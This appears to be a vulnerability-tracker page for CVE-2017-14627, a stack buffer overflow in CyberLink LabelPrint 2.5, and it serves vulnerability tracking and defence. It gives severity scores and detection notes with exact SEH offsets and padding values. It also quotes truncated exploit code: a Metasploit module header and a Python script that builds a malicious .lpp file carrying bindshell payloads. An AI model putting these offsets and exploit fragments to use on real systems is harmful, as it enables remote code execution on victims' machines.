CVE-2017-14627
published 2017-09-23CVE-2017-14627: Stack-based buffer overflows in CyberLink LabelPrint 2.5 allow remote attackers to execute arbitrary code via the (1) author (inside the INFORMATION tag), (2)…
PriorityP352high7.8CVSS 3.0
AVLACLPRNUIRSUCHIHAH
EXPLOIT
EPSS
19.19%
97.0th percentile
Stack-based buffer overflows in CyberLink LabelPrint 2.5 allow remote attackers to execute arbitrary code via the (1) author (inside the INFORMATION tag), (2) name (inside the INFORMATION tag), (3) artist (inside the TRACK tag), or (4) default (inside the TEXT tag) parameter in an lpp project file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cyberlink | labelprint | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- ·The exploit junk character must be specifically one of 'A', 'B', or 'C' — random selection from this static set is a deliberate constraint of the unicode encoding chain, not arbitrary. ↗
- ·The Metasploit module sets DisablePayloadHandler to true by default, meaning the attacker must manage their own handler externally — detections relying solely on Metasploit handler traffic may miss this. ↗
- ·The SEH overwrite offset is fixed at 790 bytes across all three target OS variants (Win7/8.1/10 x64); padding values differ per target (Padding1: 857/845/781, Padding2: 104/116/180). ↗
- ·The exploit uses x86/unicode_mixed encoder with EAX as the buffer register; decoded payload space is up to 15,000 bytes — signatures must account for unicode-encoded shellcode, not raw shellcode. ↗
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)
exploitdb·2018-12-13
CVE-2017-14627 CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)
CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule "CyberLink LabelPrint 2.5 Stack Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below.
The vulnerability is triggered when opening a .lpp project file containing overly long string characters
via open file menu. This results in overwriting a structured exception handler record and take over the
application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
},
'License' => MSF_LICENSE,
'Author' =>
[
'modpr0be ', # initial discovery and metasploit modu
Exploit-DB
CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
exploitdb·2017-09-23·CVSS 7.8
CVE-2017-14627 [HIGH] CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)
CyberLink LabelPrint \n"
bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
"\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
f.write(header+ "\n" + bug)
print "[+] File", filename2, "successfully created!"
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
print "[*] Good luck ;)"
f.close()
print "[*] "
print "[*] by f3ci & modpr0be "
print "[*] \n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
if input == 1:
align = "\x05\x09\x01" #add eax,01000400
align2 = "\x05\x0A\x01" #add eax, 01000900
junk1 = '\x42' * 68 #junk for win7x86
junk2 = '\x42' * 893 #junk for win7x86
exp()
elif input == 2:
align = "\x0
Metasploit
CyberLink LabelPrint 2.5 Stack Buffer Overflow
metasploit
CyberLink LabelPrint 2.5 Stack Buffer Overflow
CyberLink LabelPrint 2.5 Stack Buffer Overflow
This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and below. The vulnerability is triggered when opening a .lpp project file containing overly long string characters via open file menu. This results in overwriting a structured exception handler record and take over the application. This module has been tested on Windows 7 (64 bit), Windows 8.1 (64 bit), and Windows 10 (64 bit).
No writeups or analysis indexed.
https://blog.spentera.com/2017/09/19/unicode-stack-based-buffer-overflow-on-cyberlink-labelprint-2-5/https://www.exploit-db.com/exploits/42777/https://www.exploit-db.com/exploits/45985/https://blog.spentera.com/2017/09/19/unicode-stack-based-buffer-overflow-on-cyberlink-labelprint-2-5/https://www.exploit-db.com/exploits/42777/https://www.exploit-db.com/exploits/45985/
2017-09-23
Published